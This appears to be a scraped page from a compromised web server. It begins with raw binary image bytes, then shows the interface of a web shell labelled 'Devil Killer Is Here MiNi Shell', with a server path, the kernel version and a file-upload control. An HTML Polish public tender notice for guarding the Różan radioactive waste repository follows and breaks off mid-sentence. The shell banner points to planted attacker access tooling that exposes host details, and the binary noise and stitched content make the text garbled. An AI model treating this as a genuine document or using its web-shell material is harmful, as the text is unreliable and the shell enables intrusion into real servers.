JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031300001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> wykonywanie usługi społecznej w zakresie ochrony fizycznej<br/>Krajowego Składowiska Odpadów Promieniotwórczych w Różanie<br/>w 2022 – 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Unieszkodliwiania Odpadów Promieniotwórczych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017471611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sołtana 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">669250010</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(22)718 02 57</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zuop.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zuop.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> wykonywanie usługi społecznej w zakresie ochrony fizycznej<br/>Krajowego Składowiska Odpadów Promieniotwórczych w Różanie<br/>w 2022 – 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-299baec5-5b81-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00313000</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zuop.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zuop.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Składanie<br/>ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej. Komunikacja ustna<br/>dopuszczalna jest w odniesieniu do informacji, które nie są istotne. Ofertę wraz z załącznikami, o<br/>których mowa w Rozdziale VI SWZ, składa się za pośrednictwem strony tj.: zuop.ezamawiajacy.pl,<br/>zwanej dalej także Systemem. Instrukcja korzystania z Systemu, zwana dalej także Instrukcją, jest<br/>dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i procedury procesu zakupowego&#34;.<br/>Wykonawca może zwrócić się do Zamawiającego z wnioskiem (pytaniem) o wyjaśnienie treści SWZ.<br/>Pytania do SWZ należy zadawać za pośrednictwem strony internetowej prowadzonego postępowania,<br/>tj. zuop.ezamawiajacy.pl Zamawiający dopuszcza możliwość zadawania pytań do SWZ także drogą<br/>elektroniczną. Pytania należy kierować na adres przetargi@zuop.pl ze wskazaniem w tytule<br/>wiadomości numeru postępowania, którego dotyczą. Zamawiający prosi o przekazywanie pytań do<br/>treści SWZ w formie edytowalnej. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie<br/>treści SWZ. Zamawiający zamieści treść pytań wraz z wyjaśnieniami, bez ujawniania źródła zapytań,<br/>na strony internetowej prowadzonego postępowania, tj. zuop.ezamawiajacy.pl. W uzasadnionych<br/>przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. Dokonaną<br/>zmianę treści SWZ udostępnia na stronie internetowej prowadzonego postępowania, tj.<br/>zuop.ezamawiajacy.pl Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów<br/>technicznych wymaganych od Wykonawcy przy wykorzystywaniu Systemu do elektronicznej<br/>komunikacji z Wykonawcami udostępnianym pod adresem: zuop.ezamawiajacy. Oferta wraz z<br/>załącznikami musi zostać złożona w formie elektronicznej lub w postaci elektronicznej (tj.<br/>kwalifikowany podpis elektronicznym, podpis zaufany lub podpis osobisty). Wymagania techniczne:<br/>Stały dostęp do sieci Internet o przepustowości nie mniejszej niż 512 kb/s na komputer; komputer<br/>PC/MAC z aktualnym<br/>systemem operacyjnym; Zainstalowana przeglądarka wspierana przez producenta: MS Internet<br/>Explorer, Firefox, Google Chrome lub MS Edge; Zainstalowany program Acrobat Reader lub inny<br/>obsługujący pliki w formacie.pdf; Wielkość pojedynczego pliku zamieszczanego w Systemie<br/>nieprzekraczająca 100 MB; Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt,<br/>docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4,<br/>ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,XMLsig,XAdES,CAdES, ASIC, XMLenc; Plik załączony i zapisany przez Wykonawcę, widoczny jest w<br/>Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; Oznaczenie czasu<br/>odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu<br/>Miar.; W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów<br/>kwalifikowanym podpisem elektronicznym), Wykonawca musi posiadać: kwalifikowany podpis<br/>elektroniczny osoby składającej ofertę w Systemie; włączona w przeglądarce obsługa JavaScript;<br/>zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows - w<br/>wersji 32 oraz 64<br/>bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment 8u202 – Windows<br/>x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w sekcji Java SE<br/>Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE - JAVA w wersji<br/>OpenJDK)zainstalowana aplikacja Szafir Host; podłączony lub wbudowany w komputer czytnik kart<br/>podpisu elektronicznego. Szczegółowe wymagania techniczne zostały opisane w rozdziale IX SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zakład Unieszkodliwiania Odpadów Promieniotwórczych –<br/>Przedsiębiorstwo Państwowe jako Zamawiający będzie przetwarzać dane osobowe osób zgłoszonych<br/>przez Wykonawcę wskazane w dokumentacji postepowania.<br/>Informacja dla osób zgłoszonych przez Wykonawcę<br/>Pani/Pana dane osobowe, by mogła/mógł Pani/Pan uczestniczyć w postępowaniu. Mogą być<br/>przetwarzane w sposób zautomatyzowany, ale nie będą profilowane.<br/>Kto administruje Pani/Pana danymi?<br/>• Administratorem Pani/Pana danych osobowych jest Zakład Unieszkodliwiania Odpadów<br/>Promieniotwórczych – Przedsiębiorstwo Państwowe,<br/>• Na pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące<br/>Pani/Panu prawa odpowie specjalista ds. zamówień publicznych. Proszę je wysłać na adres:<br/>przetargi@zuop.pl.<br/>Dlaczego Pani/Pana dane są przetwarzane?<br/>• Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 29 stycznia 2004 r. Prawo<br/>zamówień publicznych oraz aktów wykonawczych do niej wydanych; ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych, Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/678 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu tych danych, ustawy z dnia 27 sierpnia 2009 r. o<br/>finansach publicznych, ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z<br/>dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach lub jest niezbędne do wykonania<br/>zadania w interesie publicznym albo w ramach sprawowania władzy publicznej.<br/>• Pani/Pana dane osobowe przetwarzane są w celu/celach: ubiegania się o udzielenie zamówienia<br/>publicznego.<br/>• Podanie przez Panią/Pana danych osobowych jest obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie<br/>będziemy mogli zrealizować Pana/Pani sprawy (chyba że szczegółowe przepisy prawa stanowią<br/>inaczej).<br/>Jednocześnie Zamawiający informuje, że Wykonawca ubiegając się o udzielenie zamówienia<br/>publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych<br/>z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w<br/>szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych,<br/>których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże<br/>obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy w zakresie, w<br/>jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 pkt. 4).<br/>Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO<br/>względem osób fizycznych, których dane przekazuje Zamawiającemu i Których dane pośrednio<br/>pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5<br/>RODO.<br/>W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>Wykonawcy w postępowaniu, Zamawiający zobowiązuje Wykonawcę do złożenia w postępowaniu o<br/>udzielenie zamówienia publicznego wraz z ofertą oświadczenia, którego wzór zamieszczony jest w<br/>formularzu ofertowym – załącznik nr 2.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Jak długo będą przechowywane Pani/Pana dane?<br/>Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. przez<br/>okres wynikający z przepisów ustawy Prawo zamówień publicznych, tj. okres niezbędny do realizacji<br/>celu/celów określonych powyżej, a po tym czasie przez okres oraz w zakresie wymaganym przez<br/>przepisy powszechnie obowiązującego prawa.<br/>Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.<br/>Kto może mieć dostęp do Pani/Pana danych?<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a) podmioty, którym Administrator powierzy przetwarzanie danych osobowych, w szczególności:<br/>• podmioty świadczące usługi informatyczne, pocztowe;<br/>• każdy zainteresowany odbiorca - informacje o Wykonawcach, którzy uczestniczyli w postępowaniu o<br/>udzielenie zamówienia publicznego są jawne na podstawie ustawy Pzp oraz ustawy o dostępie do<br/>informacji publicznej.<br/>• podmioty upoważnione na podstawie przepisów prawa;<br/>b) organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie<br/>przepisów prawa;<br/>Jakie mam Pani/Pana prawa w związku z przetwarzaniem Pani/Pana danych?<br/>• Ma Pani/Pan prawo do:<br/>1) dostępu do danych osobowych, w tym uzyskania kopii tych danych;<br/>2) żądania sprostowania (poprawienia) danych osobowych;<br/>3) żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku, gdy:<br/>• dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane;<br/>• nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;<br/>• wniosła Pani/Pan sprzeciw wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione<br/>podstawy przetwarzania;<br/>• Pani/Pana dane przetwarzane są niezgodnie z prawem;<br/>• Pani/Pana dane muszą być usunięte, by wywiązać się z obowiązku wynikającego z przepisów prawa.<br/>4) żądania ograniczenia przetwarzania danych osobowych;<br/>5) sprzeciwu wobec przetwarzania danych – w przypadku, gdy łącznie spełnione są następujące<br/>przesłanki:<br/>• zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją;<br/>• dane przetwarzane są w celu wykonania zadania realizowanego w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej powierzonej Administratorowi, z wyjątkiem sytuacji, w której<br/>Administrator wykaże istnienie ważnych prawnie uzasadnionych podstaw do przetwarzanie danych<br/>osobowych, nadrzędnych wobec interesów, praw i wolności osoby, której dane dotyczą, lub podstaw<br/>do ustalenia, dochodzenia lub obrony roszczeń;<br/>6) Wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa,<br/>infolinia telefoniczna: 606-950-000), w przypadku powzięcia informacji o niezgodnym z prawem<br/>przetwarzaniu Pani/Pana danych osobowych.<br/>• Nie przysługuje Pani/Panu prawo do przenoszenia danych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Przetarg 7/ ochrona KSOP /2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1258746 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie usługi w zakresie ochrony Krajowego Składowiska Odpadów Promieniotwórczych znajdującego się w Różanie poprzez:<br/>a)	stałej ochrony fizycznej, <br/>b)	stałego dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych,<br/>c)	zapewnienia wsparcie grupy interwencyjnej (Uwaga! wyłącznie w razie powstania takiej potrzeby w szczególnych sytuacjach). <br/>Usługa będzie świadczona na terenie Krajowego Składowiska Odpadów Promieniotwórczych (dalej KSOP) w Różanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79700000-1 - Usługi detektywistyczne i ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2024-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu określone w pkt. 2.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	Zdolności do występowania w obrocie prawnym, <br/>Zamawiający nie określa takich warunków<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Wykonawca powinien posiadać koncesję MSW na prowadzenie działalności w zakresie ochrony osób i mienia, w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, wydaną na podstawie ustawy o ochronie osób i mienia z dnia 22 sierpnia 1997 r. (t.j. Dz. U. z 2020 r. poz. 838).<br/>3)	Sytuacji ekonomicznej lub finansowej, <br/>Zamawiający nie określa takich warunków<br/>4)	W zakresie zdolności technicznej lub zawodowej <br/>Zamawiający uzna, że Wykonawca spełnił niniejszy warunek, jeśli wykaże, że:<br/>a)	Wykonał w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – min. 2 usługi, których przedmiotem była lub jest ochrona fizyczna budynku przemysłowego lub kompleksu budynków przemysłowych tzn. budynku/ów których głównym przeznaczeniem jest funkcja przemysłowa (wartość wykonanej pojedynczej usługi powyżej 200 000 zł brutto) oraz załączy dowody określające czy te usługi zostały wykonane należycie<br/>Zamawiający za jedną usługę uzna usługę wykonaną trwającą nieprzerwanie przez okres co najmniej 6 miesięcy (niezależnie czy została zrealizowana czy trwa). <br/>W przypadku rozliczeń za wykonane usługi w walucie obcej (innej niż PLN) przeliczając wartość tych dostaw na PLN, należy stosować przelicznik zgodny z kursem ustalonym i publikowanym przez NBP z dnia zawarcia umowy ze zleceniodawcą. <br/>W sytuacji, gdy w w/w dniu nie są publikowane kursy walut obcych przez NBP, Wykonawca przyjmuje do przeliczeń średni kurs walut obcych NBP najbliższego dnia, następującego po tym dniu, w którym NBP opublikuje średnie kursy walut obcych.<br/>b)	dysponuje przez cały okres realizacji zamówienia publicznego 8 pracownikami, którzy będą wykonywać zadania ochronne w ramach niniejszego zamówienia. Każdy z pracowników powinien spełniać następujące wymagania: <br/>	posiadać pełną zdolność do czynnej służby wojskowej pełnionej w razie ogłoszenia mobilizacji i w czasie wojny, w rozumieniu ustawy o powszechnym obowiązku obrony Rzeczypospolitej Polskiej z dnia 21 listopada 1967 r (t.j. Dz. U. z 2019 r. poz. 1541ze zm.), <br/>	odbył szkolenia w zakresie ochrony informacji niejawnych zgodnie z art. 21 ust. 4 pkt 2 ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (t.j. Dz. U. z 2019 r. poz. 742), z zastrzeżeniem, że każda osoba, która posiada dostęp do informacji klauzulowanych powinna odbywać szkolenie w zakresie ochrony informacji niejawnych nie rzadziej niż raz na 5 lat, <br/>	posiadać wpis na listę kwalifikowanych pracowników ochrony fizycznej, <br/>	posiadać pozwolenie na broń palną w celu ochrony osób i mienia, <br/>	posiadać poświadczenie bezpieczeństwa dopuszczające do informacji niejawnych o klauzuli &#34;zastrzeżonej&#34; lub wyższej, którego data ważności obejmuje okres wykonywania usługi.<br/>3.	Zamawiający informuje, iż Wykonawcy występujący wspólnie, w rozumieniu art. 58 ustawy Pzp, warunek udziału w postępowaniu wskazany w:<br/>a)	ust. 2 pkt 4) lit. a nie mogą spełniać wspólnie / łącznie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagana ilość usług nie sumuje się, 